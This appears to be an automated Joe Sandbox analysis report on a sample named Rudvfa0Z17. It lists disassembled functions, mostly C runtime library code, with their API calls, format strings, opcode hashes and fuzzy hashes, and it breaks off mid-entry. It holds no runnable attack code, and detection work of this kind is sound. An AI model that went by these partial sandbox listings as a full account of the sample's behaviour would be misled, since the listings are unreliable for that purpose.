                                • String ID:
                                • API String ID: 3282538202-0
                                • Opcode ID: e040a5a93f23b847dead2cd5b509ea3d04758d06cfb91789651a499ad4ee544a
                                • Instruction ID: 5e55d5e3cdc97a5d851e944c1f85551ef15e2c34282e0f19f6d61ff914aafdfd
                                • Opcode Fuzzy Hash: e040a5a93f23b847dead2cd5b509ea3d04758d06cfb91789651a499ad4ee544a
                                • Instruction Fuzzy Hash: 1A1119B5D00249DFEF00DFA4D446AEE7BB0FF48354F10806AF814AB252DB78AA519F51
                                Function 026DE8E0 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNEL32(100189E4,1001D2B0,00000008,026DE9E8,00000000,00000000,?,?,026DDDFC,026DB4BB,?,?,026DB068,?,?,026D1020), ref: 026DE8F1
                                • __lock.LIBCMT ref: 026DE925
                                  • Part of subcall function 026DF7D6: __mtinitlocknum.LIBCMT ref: 026DF7EC
                                  • Part of subcall function 026DF7D6: __amsg_exit.LIBCMT ref: 026DF7F8
                                  • Part of subcall function 026DF7D6: RtlEnterCriticalSection.NTDLL(00000000), ref: 026DF800
                                • InterlockedIncrement.KERNEL32(?), ref: 026DE932
                                • __lock.LIBCMT ref: 026DE946
                                • ___addlocaleref.LIBCMT ref: 026DE964
                                Memory Dump Source
                                • Source File: 00000000.00000002.3260594624.00000000026D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_26d0000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                • String ID:
                                • API String ID: 637971194-0
                                • Opcode ID: bc1e6e33b232fb84aee9128c931f2af660bdc20c21fa679934eb184c89e834a6
                                • Instruction ID: 6b9b8648ee830aef8a40b34466053ad8e28d89d21e397155eaf5a2a7c746f895
                                • Opcode Fuzzy Hash: bc1e6e33b232fb84aee9128c931f2af660bdc20c21fa679934eb184c89e834a6
                                • Instruction Fuzzy Hash: E1016D71801B04EBE720EF65D844749BBE1FF50324F10890EE49A5BBA0CBB5EA40CF55
                                Function 1000E8DC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNEL32(100189E4,1001D2B0,00000008,1000E9E4,00000000,00000000,?,?,1000DDF8,1000B4B7,?,?,1000B064,?,?,1000101C), ref: 1000E8ED
                                • __lock.LIBCMT ref: 1000E921
                                  • Part of subcall function 1000F7D2: __mtinitlocknum.LIBCMT ref: 1000F7E8
                                  • Part of subcall function 1000F7D2: __amsg_exit.LIBCMT ref: 1000F7F4
                                  • Part of subcall function 1000F7D2: RtlEnterCriticalSection.NTDLL(00000000), ref: 1000F7FC
                                • InterlockedIncrement.KERNEL32(?), ref: 1000E92E
                                • __lock.LIBCMT ref: 1000E942
                                • ___addlocaleref.LIBCMT ref: 1000E960
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                • String ID:
                                • API String ID: 637971194-0
                                • Opcode ID: bc1e6e33b232fb84aee9128c931f2af660bdc20c21fa679934eb184c89e834a6
                                • Instruction ID: 916c6ec87c4f8bcbc955037b591a6f753094f0854a764fd24730189219927c90
                                • Opcode Fuzzy Hash: bc1e6e33b232fb84aee9128c931f2af660bdc20c21fa679934eb184c89e834a6
                                • Instruction Fuzzy Hash: 5401AD75404B40EBF320CF69C84575ABBE0EF00320F10890EE49A97BA1CBB4FA41CB11
                                Function 00646CA4 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __getptd.LIBCMT ref: 00646CB0
                                  • Part of subcall function 00645CA8: __getptd_noexit.LIBCMT ref: 00645CAB
                                  • Part of subcall function 00645CA8: __amsg_exit.LIBCMT ref: 00645CB8
                                • __getptd.LIBCMT ref: 00646CC7
                                • __amsg_exit.LIBCMT ref: 00646CD5
                                • __lock.LIBCMT ref: 00646CE5
                                • __updatetlocinfoEx_nolock.LIBCMT ref: 00646CF9
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                • String ID:
                                • API String ID: 938513278-0
                                • Opcode ID: d4e355a559bb1b7d1e0f6e6558cc2fe086a99abab3a58efd638bb4dfc9e87ffc
                                • Instruction ID: 620a938ebbe17e2657e0a0ef6a5b5746d7c8c0ba285f30f13d41fe036d09b152
                                • Opcode Fuzzy Hash: d4e355a559bb1b7d1e0f6e6558cc2fe086a99abab3a58efd638bb4dfc9e87ffc
                                • Instruction Fuzzy Hash: FDF09032944710ABE7A4BB74D84378D36A2AF02721F10414DF0596B2D2CB6859818AAE
                                Function 026DE7E4 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __getptd.LIBCMT ref: 026DE7F0
                                  • Part of subcall function 026DEA0D: __getptd_noexit.LIBCMT ref: 026DEA10
                                  • Part of subcall function 026DEA0D: __amsg_exit.LIBCMT ref: 026DEA1D
                                • __getptd.LIBCMT ref: 026DE807
                                • __amsg_exit.LIBCMT ref: 026DE815
                                • __lock.LIBCMT ref: 026DE825
                                • __updatetlocinfoEx_nolock.LIBCMT ref: 026DE839
                                Memory Dump Source
                                • Source File: 00000000.00000002.3260594624.00000000026D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_26d0000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                • String ID:
                                • API String ID: 938513278-0
                                • Opcode ID: 09b6d139129d4c3b12708e604190e4842ab1e85e5585d88a535f2a9c6bdb173d
                                • Instruction ID: 13d2fa97bc96604a98c8aa51291f9583e2f97bc02afdcd1ff908ac2b7abdbfe5
                                • Opcode Fuzzy Hash: 09b6d139129d4c3b12708e604190e4842ab1e85e5585d88a535f2a9c6bdb173d
                                • Instruction Fuzzy Hash: 22F09A32D44729DBE765BBA49C05B4D37A2BF00728F14414DE412AF6D2CB26A5428E59
                                Function 1000E7E0 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __getptd.LIBCMT ref: 1000E7EC
                                  • Part of subcall function 1000EA09: __getptd_noexit.LIBCMT ref: 1000EA0C
                                  • Part of subcall function 1000EA09: __amsg_exit.LIBCMT ref: 1000EA19
                                • __getptd.LIBCMT ref: 1000E803
                                • __amsg_exit.LIBCMT ref: 1000E811
                                • __lock.LIBCMT ref: 1000E821
                                • __updatetlocinfoEx_nolock.LIBCMT ref: 1000E835
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                • String ID:
                                • API String ID: 938513278-0
                                • Opcode ID: 09b6d139129d4c3b12708e604190e4842ab1e85e5585d88a535f2a9c6bdb173d
                                • Instruction ID: c1e581abf6b3aa3cedc770c51710619a043d372c1d0baf30f0e204b42916052b
                                • Opcode Fuzzy Hash: 09b6d139129d4c3b12708e604190e4842ab1e85e5585d88a535f2a9c6bdb173d
                                • Instruction Fuzzy Hash: B2F06D36A04790DAF660EBA45806B5E33A0EF407E0F21814AF518B65DBCF24AD419B56
                                Function 004103A0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 166windowCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00547FF4: __EH_prolog3.LIBCMT ref: 00547FFB
                                • LoadIconW.USER32(?,00000080), ref: 00410554
                                • std::exception::exception.LIBCMT ref: 0041058B
                                  • Part of subcall function 00638987: std::exception::_Copy_str.LIBCMT ref: 006389A2
                                • __CxxThrowException@8.LIBCMT ref: 004105A0
                                  • Part of subcall function 00641C89: RaiseException.KERNEL32(00401FC3,?,3F7259E2,006FC518,00401FC3,?,0071C220,?,3F7259E2), ref: 00641CCB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Copy_strExceptionException@8H_prolog3IconLoadRaiseThrowstd::exception::_std::exception::exception
                                • String ID: HOST=%d PARAM1=%s
                                • API String ID: 500386467-510288069
                                • Opcode ID: a02846fbc93f5e784fd72039f5fdc23d11aa67a562bafda45b03b8c25ba9f00f
                                • Instruction ID: 3c8d3bc684d60fcecd5c8dfe43502e13f45b14ae440c8b5b3ed01ffbc29c50ef
                                • Opcode Fuzzy Hash: a02846fbc93f5e784fd72039f5fdc23d11aa67a562bafda45b03b8c25ba9f00f
                                • Instruction Fuzzy Hash: AD51E1B06043459FDB50DF78C8857DBBBE8AF08714F00852EE55ADB382DB78A984CB91
                                Function 00417360 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 163COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: _free
                                • String ID: qrcode
                                • API String ID: 269201875-2768184300
                                • Opcode ID: b7ae724dab59976927405755fddd42096b275a2b9ae2b92c7d1d6adc51a94ade
                                • Instruction ID: c0c9aa430fc308d1607b363f79eebbeb712cfc187a753c9d430ef2ce2b4ae81c
                                • Opcode Fuzzy Hash: b7ae724dab59976927405755fddd42096b275a2b9ae2b92c7d1d6adc51a94ade
                                • Instruction Fuzzy Hash: DB6103B1E042589FDB10DFA9C88179EBBB5FF48304F1081AEE449EB241DB746A85CF95
                                Function 00401A20 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 128COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00401A9C
                                • std::_Xinvalid_argument.LIBCPMT ref: 00401AB6
                                • _memmove.LIBCMT ref: 00401B0C
                                  • Part of subcall function 00401D30: std::_Xinvalid_argument.LIBCPMT ref: 00401D49
                                  • Part of subcall function 00401D30: std::_Xinvalid_argument.LIBCPMT ref: 00401D6A
                                  • Part of subcall function 00401D30: std::_Xinvalid_argument.LIBCPMT ref: 00401D85
                                  • Part of subcall function 00401D30: _memmove.LIBCMT ref: 00401DED
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Xinvalid_argumentstd::_$_memmove
                                • String ID: string too long
                                • API String ID: 2168136238-2556327735
                                • Opcode ID: 5111ff37cf27c43911fabb825e62defa93693cee735bf3554952fd6fa4e93fe8
                                • Instruction ID: 97b060a13575e745853b417087fd149ece5be724ff5a1c7c5cfeaf1b1d037eb8
                                • Opcode Fuzzy Hash: 5111ff37cf27c43911fabb825e62defa93693cee735bf3554952fd6fa4e93fe8
                                • Instruction Fuzzy Hash: 5431D3323006104BD7249E5DE88096BF7EAEFD2760B60493FF496976E1D774AC448BA8
                                Function 00405750 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 109COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Xinvalid_argument_memmovestd::_
                                • String ID: P:@$string too long
                                • API String ID: 256744135-887560500
                                • Opcode ID: 01d2339d28d8993f240ba90f0c4f54b57ff6d7e0425e8d1d6e3a331d66730f60
                                • Instruction ID: e1572dfa30291538e1104b65d0c9648f690ed9276a06c13b321248f19cecc49b
                                • Opcode Fuzzy Hash: 01d2339d28d8993f240ba90f0c4f54b57ff6d7e0425e8d1d6e3a331d66730f60
                                • Instruction Fuzzy Hash: E9319236314A148BCA24AE5CE98086BB3EAEFD1711720492FE442D7690D735AC45DFA9
                                Function 00405460 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 81COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00405474
                                  • Part of subcall function 0065BD54: std::exception::exception.LIBCMT ref: 0065BD69
                                  • Part of subcall function 0065BD54: __CxxThrowException@8.LIBCMT ref: 0065BD7E
                                  • Part of subcall function 0065BD54: std::exception::exception.LIBCMT ref: 0065BD8F
                                • std::_Xinvalid_argument.LIBCPMT ref: 00405483
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                • String ID: string too long
                                • API String ID: 963545896-2556327735
                                • Opcode ID: 5fc5c3486ac89371a71539facb618ac1118246e8fbfd7318b339debac40097cf
                                • Instruction ID: cc32dd397e5fbe50cd7e113d676059e06672086655c2f4c6a8c45dde24df3c6e
                                • Opcode Fuzzy Hash: 5fc5c3486ac89371a71539facb618ac1118246e8fbfd7318b339debac40097cf
                                • Instruction Fuzzy Hash: 3621C832304A545BC7319A5C98006ABFBE9DFA2722F20496FF5909B3D1C3759884CBA9
                                Function 004038A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64COMMON
                                Download Yara Rule
                                APIs
                                • __time64.LIBCMT ref: 004038C4
                                  • Part of subcall function 00639CAB: GetSystemTimeAsFileTime.KERNEL32(004039B9,?,?,?,004039B9,?), ref: 00639CB6
                                  • Part of subcall function 00639CAB: __aulldiv.LIBCMT ref: 00639CD6
                                • __localtime64_s.LIBCMT ref: 004038D7
                                • _memset.LIBCMT ref: 004038F2
                                  • Part of subcall function 00406490: _vswprintf_s.LIBCMT ref: 004064A1
                                Strings
                                • %04d-%02d-%02d %02d:%02d:%02d, xrefs: 00403928
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Time$FileSystem__aulldiv__localtime64_s__time64_memset_vswprintf_s
                                • String ID: %04d-%02d-%02d %02d:%02d:%02d
                                • API String ID: 3156645594-4146437471
                                • Opcode ID: a16a008088b9f56a31778b2dcf5c1334517a543c49de5ed3ede09de6744d7d87
                                • Instruction ID: 15b2947ff6a5db42539aadc5135ab5fbd8eee3ececa8eac2c0325d1fac083d0f
                                • Opcode Fuzzy Hash: a16a008088b9f56a31778b2dcf5c1334517a543c49de5ed3ede09de6744d7d87
                                • Instruction Fuzzy Hash: A12162719002189BCB64EF94DC49BEBB3B9EF48304F4042DDA50A97241DB78AF44CF94
                                Function 00422FB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64COMMON
                                Download Yara Rule
                                APIs
                                • __time64.LIBCMT ref: 00422FD4
                                  • Part of subcall function 00639CAB: GetSystemTimeAsFileTime.KERNEL32(004039B9,?,?,?,004039B9,?), ref: 00639CB6
                                  • Part of subcall function 00639CAB: __aulldiv.LIBCMT ref: 00639CD6
                                • __localtime64_s.LIBCMT ref: 00422FE7
                                • _memset.LIBCMT ref: 00423002
                                  • Part of subcall function 00406490: _vswprintf_s.LIBCMT ref: 004064A1
                                Strings
                                • %04d_%02d_%02d_%02d_%02d_%02d, xrefs: 00423038
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Time$FileSystem__aulldiv__localtime64_s__time64_memset_vswprintf_s
                                • String ID: %04d_%02d_%02d_%02d_%02d_%02d
                                • API String ID: 3156645594-93539013
                                • Opcode ID: 0526b4803325ebd150cafc0210276a305306880acaed0b59d1ebb4d9f9cf6030
                                • Instruction ID: d5d1dacfc4af3f9f040ec24c02856240f88c3ff2530fd8b4ec03b638b15ec1f6
                                • Opcode Fuzzy Hash: 0526b4803325ebd150cafc0210276a305306880acaed0b59d1ebb4d9f9cf6030
                                • Instruction Fuzzy Hash: FD2142719112189BCB64EF54DC49BDBB3F9EF48704F4042DDA40A97241DB78AB44CF95
                                Function 00403990 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON
                                Download Yara Rule
                                APIs
                                • __time64.LIBCMT ref: 004039B4
                                  • Part of subcall function 00639CAB: GetSystemTimeAsFileTime.KERNEL32(004039B9,?,?,?,004039B9,?), ref: 00639CB6
                                  • Part of subcall function 00639CAB: __aulldiv.LIBCMT ref: 00639CD6
                                • __localtime64_s.LIBCMT ref: 004039C7
                                • _memset.LIBCMT ref: 004039E2
                                  • Part of subcall function 00406490: _vswprintf_s.LIBCMT ref: 004064A1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Time$FileSystem__aulldiv__localtime64_s__time64_memset_vswprintf_s
                                • String ID: %d-%d-%d
                                • API String ID: 3156645594-1067691376
                                • Opcode ID: c5c87357be4c98ca3ecd8e5a9591ece30f3b8fa64cc049ffa35eda3bbaa30f68
                                • Instruction ID: 23a16f6b0a6d0b17663dc7892d2e80e6e6363daeedcece8f305be328ad56f313
                                • Opcode Fuzzy Hash: c5c87357be4c98ca3ecd8e5a9591ece30f3b8fa64cc049ffa35eda3bbaa30f68
                                • Instruction Fuzzy Hash: 0A1151759003189BCB64EF54DC49BEBB3F9EF48704F4046D9A80A97241EB786B44CF95
                                Function 00428A50 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON
                                Download Yara Rule
                                APIs
                                • __strftime_l.LIBCMT ref: 00428A94
                                • OutputDebugStringA.KERNEL32(?,?,?,?,?,3F7259E2), ref: 00428AA3
                                • GetACP.KERNEL32(?,?,?,?,3F7259E2), ref: 00428AA9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: DebugOutputString__strftime_l
                                • String ID: AYr?
                                • API String ID: 920015632-764355088
                                • Opcode ID: d4b68dfb011a3288682d52a9e2bcf34ea76627454710e0316a5017d4cb829102
                                • Instruction ID: dcfaa1390d6786c995b91cdc18cefb24a91750fbee7885cdc22774bdbf0dc6e0
                                • Opcode Fuzzy Hash: d4b68dfb011a3288682d52a9e2bcf34ea76627454710e0316a5017d4cb829102
                                • Instruction Fuzzy Hash: 9F1193B1D4424DEBDB14DF64DD45BAA73B9EB04300F0042AEE50A97281EB74AB44CB95
                                Function 00425950 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45windowCOMMON
                                Download Yara Rule
                                APIs
                                • GdipCreateBitmapFromStream.GDIPLUS ref: 0042597D
                                • GdipDisposeImage.GDIPLUS(?), ref: 00425994
                                • GdipDisposeImage.GDIPLUS(?,005A0D08), ref: 004259BA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Gdip$DisposeImage$BitmapCreateFromStream
                                • String ID: hqm
                                • API String ID: 800915452-3164739288
                                • Opcode ID: 6f22389f9ee89c898598460b817fd1876523e87269959f077286564e6c20e882
                                • Instruction ID: c1ef16143cb8cd1fc15283b845f64306847cceadf28a02d869238304c3ffdad0
                                • Opcode Fuzzy Hash: 6f22389f9ee89c898598460b817fd1876523e87269959f077286564e6c20e882
